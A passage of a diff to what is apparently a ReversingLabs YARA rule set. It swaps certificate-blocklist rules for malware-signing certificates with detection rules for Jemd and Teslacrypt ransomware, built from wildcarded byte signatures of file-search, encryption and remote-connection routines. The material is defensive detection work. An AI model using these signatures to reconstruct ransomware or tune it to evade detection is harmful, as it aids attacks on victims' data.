?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? + DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? + 8E 69 3F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 09 8E 69 3F ?? ?? ?? ?? 08 + } + $find_files_p2 = { + 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 07 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 + ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? + 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? + ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? + 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC DE ?? 26 + DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 07 11 ?? 28 + ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? + 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? + ?? 6F ?? ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F + ?? ?? ?? ?? DC DE ?? 26 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 2A + } + $remote_connection = { + 73 ?? ?? ?? ?? 0A 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 17 28 ?? ?? ?? + ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 1C 6F ?? ?? ?? ?? 2B ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? + 1C 6F ?? ?? ?? ?? 06 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? + ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 17 0B DE ?? 26 72 ?? ?? ?? ?? + 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 07 2A + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Akhirah Technologies Inc." and (pe.signatures[i].serial=="00:e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11" or pe.signatures[i].serial=="e3:82:59:cf:24:cc:70:2c:e4:41:b6:83:ad:57:89:11") and 1597276800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($encrypt_file) and ($aes_encrypt) and ($remote_connection) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_Bdc81Bc76090Dae0Eee2E1Eb744A4F9A : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Jemd : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Jemd ransomware." author = "ReversingLabs" - id = "66feefd2-9cec-56fc-a1c1-11004363462d" - date = "2023-11-08" - modified = "2023-11-08" + id = "ef981ffa-8801-50f0-9441-5f2bfcf44133" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5024-L5042" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "4fc3e57bedb6fb7c96e6a1ee2ad2aec3860716ac714d52ea58b86be4bbda4660" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Jemd.yara#L1-L105" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "552e0fc118031e953dee2e7c6bf8234a5a90de8c34b0e2724dfe99f2b28b8c51" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Jemd" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ALM4U GmbH" and (pe.signatures[i].serial=="00:bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a" or pe.signatures[i].serial=="bd:c8:1b:c7:60:90:da:e0:ee:e2:e1:eb:74:4a:4f:9a") and 1579824000<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_B2E730B0526F36Faf7D093D48D6D9997 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "eb82e05b-9aee-5ea7-88a5-8d186b8aafb8" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5044-L5062" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "f74cc94428d7739abf6ee76f6cbd53aa47cea815a014de0d786fe53b15f66201" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $find_files_1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 33 DB 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B + 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? + ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? + 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 75 + ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B + 45 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B + 85 ?? ?? ?? ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 + ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 + } + $find_files_2 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ?? + 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? + ?? ?? 8D B5 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ?? ?? ?? 89 + C3 BB ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4B 75 ?? 33 DB 8D 45 ?? 33 C9 BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8A 14 1E 88 54 05 ?? 40 43 80 3C 1E ?? 74 ?? 83 F8 + ?? 7E ?? 43 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ?? + ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 80 7C 1E + ?? ?? 75 ?? 80 3C 1E ?? 74 ?? 81 FB ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 33 C0 5A 59 59 64 + 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $encrypt_files_p1 = { + 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? + ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? + ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D + 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 + 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? + 8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? + BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 + ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 + FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? + ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 + 8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? + ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF + } + $encrypt_files_p2 = { + 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? + ?? 8B C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? + ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B + 45 ?? 50 8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA + ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF + 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? + ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 + 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B + 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? + ?? ?? ?? E8 ?? ?? ?? ?? C3 + } + $main_routine = { + 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 + ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? E8 ?? + ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? + ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 8D 55 ?? 66 + B8 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? + E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? + A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 35 + ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? + 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B + 0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 8D 55 ?? + 33 C0 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF + 51 + } condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Bamboo Connect s.r.o." and (pe.signatures[i].serial=="00:b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97" or pe.signatures[i].serial=="b2:e7:30:b0:52:6f:36:fa:f7:d0:93:d4:8d:6d:99:97") and 1597276800<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and ($main_routine) and ( all of ($find_files_*)) and ( all of ($encrypt_files_p*)) } -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_7156Ec47Ef01Ab8359Ef4304E5Af1A05 : INFO FILE +rule REVERSINGLABS_Win32_Ransomware_Teslacrypt : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Certificate used for digitally signing malware." + description = "Yara rule that detects Teslacrypt ransomware." author = "ReversingLabs" - id = "b285a407-7f71-5c7e-baae-bfa111a50101" - date = "2023-11-08" - modified = "2023-11-08" + id = "842dae76-573c-564d-b658-ccdda451df21" + date = "2020-07-15" + modified = "2020-07-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5064-L5080" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7bb093287dd309ce12859eca9a9fc98095b3d52ec860626fe6e743bace262fde" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.Teslacrypt.yara#L1-L665" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "cc054be68d833d9f29a4ebd1c202922881b0d22a2605edc7def1048dc08f6325" score = 75 - quality = 90 - tags = "INFO, FILE" + quality = 65 + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "Teslacrypt" importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BOREC, OOO" and pe.signatures[i].serial=="71:56:ec:47:ef:01:ab:83:59:ef:43:04:e5:af:1a:05" and 1597363200<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_13794371C052Ec0559E9B492Abb25C26 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "31f119a3-e0da-5875-826f-68c40c6f8b88" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5082-L5098" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "7383d1fb1fa6e49f8fa9e1eecfe3fcedb8a11702fbd3700630a11b12da29fedf" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $file_search_0_3_1_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 + 24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? + 51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 B5 01 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? + 83 3D ?? ?? ?? ?? ?? 0F 85 89 01 00 00 F6 44 24 ?? ?? 0F 84 D2 00 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 + 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 + 29 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 + C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 EA 00 00 00 56 8D 94 24 ?? ?? ?? ?? 68 + } + $file_search_0_3_1_2 = { + 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 7E FE FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 24 ?? + 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? + 85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? EB + 11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? ?? ?? + 0F 84 6A FE FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $file_search_0_3_3_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 + 24 ?? ?? ?? ?? 6A ?? 50 66 C7 84 24 ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? + ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? + 51 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F 84 57 02 00 00 53 8B 1D ?? ?? ?? ?? 57 8B BC 24 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ?? + 83 3D ?? ?? ?? ?? ?? 0F 85 2B 02 00 00 F6 44 24 ?? ?? 0F 84 74 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 + 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 + CB 01 00 00 8D 4C 24 ?? B8 ?? ?? ?? ?? 8D 49 ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 + C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 8C 01 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? + 52 E8 ?? ?? ?? ?? 8B C6 83 C4 ?? 8D 50 ?? 8B FF 66 8B 08 83 C0 ?? 66 85 C9 75 F5 2B C2 D1 F8 83 F8 ?? 76 1A 68 ?? ?? ?? + ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 + } + $file_search_0_3_3_2 = { + E8 ?? ?? ?? ?? 83 C4 ?? 8D 8C 24 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 + ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB 05 1B C0 83 D8 ?? 85 C0 0F 84 E8 00 00 00 8D 8C 24 ?? ?? ?? ?? B8 ?? + ?? ?? ?? 66 8B 10 66 3B 11 75 1E 66 85 D2 74 15 66 8B 50 ?? 66 3B 51 ?? 75 0F 83 C0 ?? 83 C1 ?? 66 85 D2 75 DE 33 C0 EB + 05 1B C0 83 D8 ?? 85 C0 0F 84 A9 00 00 00 8D 84 24 ?? ?? ?? ?? 57 50 E8 DC FD FF FF 83 C4 ?? E9 93 00 00 00 56 8D 8C 24 + ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 44 + 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 54 24 ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 + C4 ?? 85 FF 74 25 85 C0 75 35 8D 44 24 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 75 23 8D 8C 24 ?? ?? ?? ?? 51 E8 ?? ?? ?? + ?? EB 11 85 C0 74 10 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 55 FF D3 85 C0 74 0D 83 3D ?? ?? ?? + ?? ?? 0F 84 C8 FD FF FF 55 FF 15 ?? ?? ?? ?? 5F 5B 8B 8C 24 ?? ?? ?? ?? 5E 5D 33 CC E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? C3 + } + $file_search_0_3_4a_1 = { + B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 55 56 8B B4 24 ?? ?? ?? ?? 57 33 FF 68 ?? ?? ?? + ?? 8D 84 24 ?? ?? ?? ?? 57 50 66 89 BC 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8C 24 ?? ?? ?? ?? 57 51 66 89 BC + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? + ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D 94 24 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B E8 83 FD ?? 0F + 84 99 02 00 00 8B BC 24 ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 85 76 02 00 00 F6 44 24 ?? ?? 0F 84 6B + 01 00 00 8D 44 24 ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 02 00 00 8D 4C 24 ?? 51 68 ?? ?? ?? ?? E8 + ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 1E 02 00 00 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? + 83 C4 ?? 83 F8 ?? 76 1A 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 4C 24 ?? 51 8D + 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 + 0F 84 AF 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 92 01 00 00 8D 94 24 ?? ?? + ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 75 01 00 00 8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 + } + $file_search_0_3_4a_2 = { + 83 C4 ?? 85 C0 0F 84 58 01 00 00 8D 8C 24 ?? ?? ?? ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 3B 01 + 00 00 8D 94 24 ?? ?? ?? 